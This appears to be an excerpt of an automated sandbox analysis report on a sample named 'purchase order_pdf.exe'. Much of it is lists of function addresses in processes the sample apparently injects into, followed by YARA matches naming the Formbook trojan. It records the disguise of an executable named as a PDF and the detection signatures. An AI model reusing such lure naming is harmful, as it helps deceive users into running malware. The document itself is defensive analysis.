Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_00886843	0_2_00886843
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008A89DF	0_2_008A89DF
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008A6A94	0_2_008A6A94
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008F0AE2	0_2_008F0AE2
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_00888A0E	0_2_00888A0E
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008CEB07	0_2_008CEB07
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008D8B13	0_2_008D8B13
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_0089CD61	0_2_0089CD61
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008A7006	0_2_008A7006
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_00883190	0_2_00883190
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_0088710E	0_2_0088710E
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_00871287	0_2_00871287
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008933C7	0_2_008933C7
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_0089F419	0_2_0089F419
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_00885680	0_2_00885680
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008916C4	0_2_008916C4
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008858C0	0_2_008858C0
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008978D3	0_2_008978D3
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_00891BB8	0_2_00891BB8
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008A9D05	0_2_008A9D05
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_0087FE40	0_2_0087FE40
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_00891FD0	0_2_00891FD0
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_0089BFE6	0_2_0089BFE6
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_03643660	0_2_03643660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403840	1_2_00403840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042E053	1_2_0042E053
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040282A	1_2_0040282A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402830	1_2_00402830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004010C0	1_2_004010C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00410893	1_2_00410893
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004010BE	1_2_004010BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E913	1_2_0040E913
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004029F0	1_2_004029F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004033FF	1_2_004033FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00404C54	1_2_00404C54
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403400	1_2_00403400
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402CA4	1_2_00402CA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402CB0	1_2_00402CB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00410673	1_2_00410673
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416FDF	1_2_00416FDF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416FE3	1_2_00416FE3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FA352	1_2_037FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038003E6	1_2_038003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374E3F0	1_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0274	1_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C02C0	1_2_037C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C8158	1_2_037C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038001AA	1_2_038001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DA118	1_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03730100	1_2_03730100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F81CC	1_2_037F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F41A2	1_2_037F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D2000	1_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03764750	1_2_03764750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373C7C0	1_2_0373C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375C6E0	1_2_0375C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03800591	1_2_03800591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740535	1_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F2446	1_2_037F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E4420	1_2_037E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EE4F6	1_2_037EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FAB40	1_2_037FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F6BD7	1_2_037F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03756962	1_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0380A9A6	1_2_0380A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374A840	1_2_0374A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03742840	1_2_03742840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E8F0	1_2_0376E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037268B8	1_2_037268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B4F40	1_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03760F30	1_2_03760F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E2F30	1_2_037E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03782F28	1_2_03782F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03732FC8	1_2_03732FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BEFA0	1_2_037BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740E59	1_2_03740E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FEE26	1_2_037FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FEEDB	1_2_037FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03752E90	1_2_03752E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FCE93	1_2_037FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DCD1F	1_2_037DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374AD00	1_2_0374AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373ADE0	1_2_0373ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03758DBF	1_2_03758DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740C00	1_2_03740C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03730CF2	1_2_03730CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E0CB5	1_2_037E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372D34C	1_2_0372D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F132D	1_2_037F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0378739A	1_2_0378739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375D2F0	1_2_0375D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E12ED	1_2_037E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375B2C0	1_2_0375B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037452A0	1_2_037452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372F172	1_2_0372F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0377516C	1_2_0377516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374B1B0	1_2_0374B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0380B16B	1_2_0380B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F70E9	1_2_037F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FF0E0	1_2_037FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EF0CC	1_2_037EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037470C0	1_2_037470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FF7B0	1_2_037FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03785630	1_2_03785630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F16CC	1_2_037F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F7571	1_2_037F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038095C3	1_2_038095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DD5B0	1_2_037DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03731460	1_2_03731460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FF43F	1_2_037FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FFB76	1_2_037FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B5BF0	1_2_037B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0377DBF9	1_2_0377DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375FB80	1_2_0375FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B3A6C	1_2_037B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FFA49	1_2_037FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F7A46	1_2_037F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EDAC6	1_2_037EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DDAAC	1_2_037DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03785AA0	1_2_03785AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E1AA3	1_2_037E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03749950	1_2_03749950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375B950	1_2_0375B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D5910	1_2_037D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AD800	1_2_037AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037438E0	1_2_037438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FFF09	1_2_037FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03703FD2	1_2_03703FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03703FD5	1_2_03703FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FFFB1	1_2_037FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03741F92	1_2_03741F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03749EB0	1_2_03749EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F7D73	1_2_037F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F1D5A	1_2_037F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03743D40	1_2_03743D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375FDC0	1_2_0375FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B9C32	1_2_037B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FFCF2	1_2_037FFCF2
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05060591	6_2_05060591
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05044420	6_2_05044420
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05052446	6_2_05052446
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FA0535	6_2_04FA0535
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0504E4F6	6_2_0504E4F6
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FBC6E0	6_2_04FBC6E0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04F9C7C0	6_2_04F9C7C0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FA0770	6_2_04FA0770
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FC4750	6_2_04FC4750
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0503A118	6_2_0503A118
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05028158	6_2_05028158
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_050541A2	6_2_050541A2
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_050601AA	6_2_050601AA
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_050581CC	6_2_050581CC
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05032000	6_2_05032000
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04F90100	6_2_04F90100
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0505A352	6_2_0505A352
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_050603E6	6_2_050603E6
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FAE3F0	6_2_04FAE3F0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05040274	6_2_05040274
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_050202C0	6_2_050202C0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04F90CF2	6_2_04F90CF2
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0503CD1F	6_2_0503CD1F
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FA0C00	6_2_04FA0C00
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04F9ADE0	6_2_04F9ADE0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FB8DBF	6_2_04FB8DBF
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05040CB5	6_2_05040CB5
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FAAD00	6_2_04FAAD00
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05042F30	6_2_05042F30
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05014F40	6_2_05014F40
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FB2E90	6_2_04FB2E90
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0501EFA0	6_2_0501EFA0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FA0E59	6_2_04FA0E59
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0505EE26	6_2_0505EE26
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04F92FC8	6_2_04F92FC8
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0505CE93	6_2_0505CE93
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FC0F30	6_2_04FC0F30
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FE2F28	6_2_04FE2F28
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0505EEDB	6_2_0505EEDB
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FCE8F0	6_2_04FCE8F0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04F868B8	6_2_04F868B8
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0506A9A6	6_2_0506A9A6
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FA2840	6_2_04FA2840
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FAA840	6_2_04FAA840
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FA29A0	6_2_04FA29A0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FB6962	6_2_04FB6962
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0505AB40	6_2_0505AB40
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04F9EA80	6_2_04F9EA80
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05056BD7	6_2_05056BD7
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05057571	6_2_05057571
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04F91460	6_2_04F91460
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0503D5B0	6_2_0503D5B0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_050695C3	6_2_050695C3
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0505F43F	6_2_0505F43F
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0505F7B0	6_2_0505F7B0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FE5630	6_2_04FE5630
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_050516CC	6_2_050516CC
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FA70C0	6_2_04FA70C0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0506B16B	6_2_0506B16B
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FAB1B0	6_2_04FAB1B0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04F8F172	6_2_04F8F172
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FD516C	6_2_04FD516C
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0504F0CC	6_2_0504F0CC
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0505F0E0	6_2_0505F0E0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_050570E9	6_2_050570E9
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FBD2F0	6_2_04FBD2F0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0505132D	6_2_0505132D
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FBB2C0	6_2_04FBB2C0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FA52A0	6_2_04FA52A0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FE739A	6_2_04FE739A
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04F8D34C	6_2_04F8D34C
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_050412ED	6_2_050412ED
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05051D5A	6_2_05051D5A
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05057D73	6_2_05057D73
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05019C32	6_2_05019C32
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FBFDC0	6_2_04FBFDC0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FA3D40	6_2_04FA3D40
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0505FCF2	6_2_0505FCF2
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0505FF09	6_2_0505FF09
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FA9EB0	6_2_04FA9EB0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0505FFB1	6_2_0505FFB1
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04F63FD5	6_2_04F63FD5
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04F63FD2	6_2_04F63FD2
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FA1F92	6_2_04FA1F92
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05035910	6_2_05035910
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FA38E0	6_2_04FA38E0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0500D800	6_2_0500D800
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FA9950	6_2_04FA9950
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FBB950	6_2_04FBB950
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FE5AA0	6_2_04FE5AA0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0505FB76	6_2_0505FB76
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05015BF0	6_2_05015BF0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FDDBF9	6_2_04FDDBF9
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05057A46	6_2_05057A46
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0505FA49	6_2_0505FA49
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05013A6C	6_2_05013A6C
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04FBFB80	6_2_04FBFB80
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_05041AA3	6_2_05041AA3
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0503DAAC	6_2_0503DAAC
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_0504DAC6	6_2_0504DAC6
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D519E0	6_2_02D519E0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D6A5A0	6_2_02D6A5A0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D4CBC0	6_2_02D4CBC0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D4AE60	6_2_02D4AE60
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D4CDE0	6_2_02D4CDE0
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D411A1	6_2_02D411A1
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D53530	6_2_02D53530
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_02D5352C	6_2_02D5352C
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04DBB0E8	6_2_04DBB0E8
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04DBC07D	6_2_04DBC07D
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04DBA3A9	6_2_04DBA3A9
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04DBBCE8	6_2_04DBBCE8
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: 6_2_04DBBBC8	6_2_04DBBBC8

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03775130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03787E54 appears 107 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0372B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 037BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 037AEA12 appears 86 times
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: String function: 00877F41 appears 35 times
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: String function: 00898B40 appears 42 times
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: String function: 00890D27 appears 70 times
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: String function: 04FE7E54 appears 107 times
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: String function: 0501F290 appears 103 times
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: String function: 0500EA12 appears 86 times
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: String function: 04F8B970 appears 262 times
Source: C:\Windows\SysWOW64\isoburn.exe	Code function: String function: 04FD5130 appears 58 times

Source: purchase order_pdf.exe, 00000000.00000003.1646327263.0000000003E2D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs purchase order_pdf.exe
Source: purchase order_pdf.exe, 00000000.00000003.1646546825.0000000003C83000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs purchase order_pdf.exe

Source: purchase order_pdf.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.2065361338.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4110965953.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4111287403.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
